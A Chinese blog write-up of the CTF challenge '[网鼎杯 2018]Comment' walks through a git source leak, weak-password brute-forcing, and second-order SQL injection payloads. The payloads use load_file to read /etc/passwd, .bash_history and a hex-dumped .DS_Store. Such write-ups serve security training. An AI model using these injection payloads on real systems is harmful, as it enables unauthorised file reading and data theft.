[网鼎杯 2018]Comment

已于 2022-11-29 19:24:42 修改
阅读量126 收藏
点赞数
分类专栏: BUUCTF 文章标签: git web安全
于 2022-11-28 17:23:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/128081757
版权

进来是一个留言板

要留言的话,需要登录,给了账号,密码后3位需要爆破

爆破结果是666

这道题存在git源码泄露,使用工具GitHacker

打开发现没有东西,修复一下

git log --reflog
git reset --hard e5b2a2443c

得到源代码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

首先第一次发帖的时候,addslashes()会对预定字符进行转义,但是写入数据库之后会把转义符去掉,所以这就为我们评论的时候第二次从数据库中将categoty取出来提供了基础

将category的值设定为:a',content=database(),/*

在评论的时候,在content里输入*/#,其中*/是闭合前面的多行注释,#是对本行的剩余部分进项注释

所以执行的sql语句就是

    $sql = "insert into board
            set category = 'a',content=database(),/*',
                title = '*/#',
                content = '$content'";

得到数据库

使用load_file函数读取文件/etc/passwd

a',content=(select(load_file('/etc/passwd'))),/*

www用户的目录是/home/www,可以查询该用户的.bash_history文件

Bash shell在“/.bash_history”(“/”表示用户目录)文件中保存了500条使用过的命令,这样可以使你输入使用过的长命令变得容易。每个在系统中拥有账号的用户在他的目录下都有一个“.bash_history”文件。

a',content=(select(load_file('/home/www/.bash_history'))),/*

 

查看.DS_Store,.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件

注意这个操作:

  1. 在/tmp目录下解压html.zip,

  2. 然后删除html.zip,

  3. 然后将html文件夹copy到/var/www目录下,

  4. 然后跳转至/var/www/html目录,将.DS_Store文件删除

读取/tmp/html目录下的.DS_Store文件

a',content=(select(load_file('/tmp/html/.DS_Store'))),/*

显示了一部分

a',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

得到

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

解码

再读取

a',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

解码

得到flag

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle comment命令用法示例分享
09-10
oracle comment on命令说明及用法示例,大家参考使用吧
powerdesigner,将name自动填充到注释(comment)。
08-10
PowerDesigner->Tools->Execute Commands->Edit/Run Scripts 将comment覆盖name。 将name自动填充到注释(comment)。
[网鼎杯 2018]Comment -----不会编程的崽
最新发布
不会编程的崽的博客
03-25 1028
网鼎杯 二次注入 Git泄露 弱口令
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 452
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
python123平台作业答案第十二周_【2018网鼎杯CTF 第二场】红日安全-网鼎杯WriteUp(24日 更新:web详解)...
weixin_39607836的博客
11-24 590
本次比赛主要由红日安全ctf小组奋力拼搏,才可以拿到第二场第四的成绩。感谢他们的付出,才可以让我们看到精彩的wp1.签到题2.虚幻题目提示汉信码。使用 binwalk 提取出 9 张图,拼接成如下用 stegsolve 取 R7 保存并取反色补上汉信码的 4 个角,扫描即可获得 flag3.calc题目如下,这是一个计算器,可以执行一些简单的算式。题目提示正则有问题,所以正则应该是可以绕过的。我们...
网鼎杯 2018 comment
feng的博客
10-30 688
知识点 爆破弱密码 git泄露 二次注入 .bash_history WP 首先进入环境,是一个留言板的东西,而且按照题目描述的SQL,肯定又是SQL注入了。不过还不能直接留言,需要登录。登录就是爆破密码的后三位,爆出来是zhangwei666,然后登录。 如果提前用dirsearch扫了的话,会发现存在git泄露。利用工具弄下来,得到2个文件,那个关键的文件内容如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'
comment_css_flask-comment_
09-29
用python flask开发的简单评论功能。
mysqldocdump-comment-import-markdown
01-16
linux环境运行根据mysql的comment属性导出markdown格式的数据文档 ./mysqldocdump -u user -p xxxx -h 127.0.0.1 -D dbname -o db.md ./mysqldocdump -h markdown查看工具 推荐Typora
wap_manage.rar_comment tools
09-24
深度WAP企业网站程序V1.0 采用DeepWAP XML开发,包含有资讯、产品、新闻、搜索、留言、工具等,新闻文章可以发表评论,通过后台WEB审核显示。新闻资讯和下载栏目支持二级深度,同时支持一二级深度栏目混合使用。...
[BUUCTF]第二天训练
Y4tacker的博客
09-30 3903
文章目录[GWCTF 2019]枯燥的抽奖[网鼎杯 2018]Comment[BJDCTF 2nd]elementmaster[MRCTF2020]套娃[HCTF 2018]WarmUp参考文章 [GWCTF 2019]枯燥的抽奖 打开题目是这玩意儿 查看源代码!!!发现关键网页打开看看!! 下面就是代码审计环节 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start();
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 1558
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
攻防世界(pwn)easyfmt
PLpa的博客
03-02 1065
这题出的很奇怪,本地调试不知道为什么出问题,远程也调了很久才通,希望路过的大佬提出更好的思路和解题方式! 查看一下保护: 开了canary,NX,部分打开RELRO,没开PIE,可以尝试got表的覆盖。 这里不能有时候全信,还是要打开IDA自己分析才行。 可以看到有明显的格式化字符串漏洞,看看怎么利用他。 要运行到格式化字符串漏洞,我们必须完成一个判定,我们进入CheckIn函数看看。 Ch...
sql COMMENT
09-12
SQL COMMENT 是用于在 SQL 查询或表中添加注释的语法。它可以帮助开发者和数据库管理员更好地理解和维护数据库对象。在 SQL 查询中,可以使用 COMMENT 关键字来添加注释,格式如下: ``` SELECT column_name FROM table_name COMMENT 'This is a comment'; ``` 在上面的例子中,可以在 SELECT 查询语句后面使用 COMMENT 关键字来添加注释说明查询的目的或其他相关信息。 另外,在创建或修改表结构时,也可以使用 COMMENT 关键字来为表、列或约束添加注释,示例如下: ``` CREATE TABLE table_name ( column1 datatype COMMENT 'Comment for column1', column2 datatype COMMENT 'Comment for column2' ); ALTER TABLE table_name MODIFY column_name datatype COMMENT 'This is a comment'; ``` 通过添加注释,可以提供更多的上下文信息,使得其他人更容易理解数据库结构和查询意图。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值